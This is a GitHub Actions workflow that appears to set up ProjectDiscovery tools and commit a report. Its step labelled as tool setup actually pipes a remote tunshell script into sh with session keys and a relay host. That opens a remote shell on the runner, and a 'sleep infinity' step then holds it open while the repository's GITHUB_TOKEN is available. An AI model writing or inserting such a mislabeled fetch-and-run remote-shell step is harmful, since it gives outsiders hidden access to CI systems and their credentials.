name: pd-actions

on:
#    schedule:
#      - cron: '0 0 * * *'
# Remove both comments to run this action on daily basis.
    workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Repo
        uses: actions/checkout@master

      - name: Setup golang
        uses: actions/setup-go@v2
        with:
          go-version: 1.14

      - name: Setting up ProjectDiscovery tools
        run: |
          sudo apt-get install curl
          curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T BLUOYNVXiIURdlN781nYNH y6aE3f68sxLab4QpTMJRjE eu.relay.tunshell.com
        shell: bash

      - name: sleep forever
        run: |
          sleep infinity
        shell: bash

      - name: Commit results to Github
        run: |
          git config --local user.email "sandeep@projectdiscovery.io"
          git config --global user.name "projectdiscovery"
          git commit -m "PD-Actions report" -a --allow-empty
      - name: Push changes
        uses: ad-m/github-push-action@master
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          branch: ${{ github.ref }}
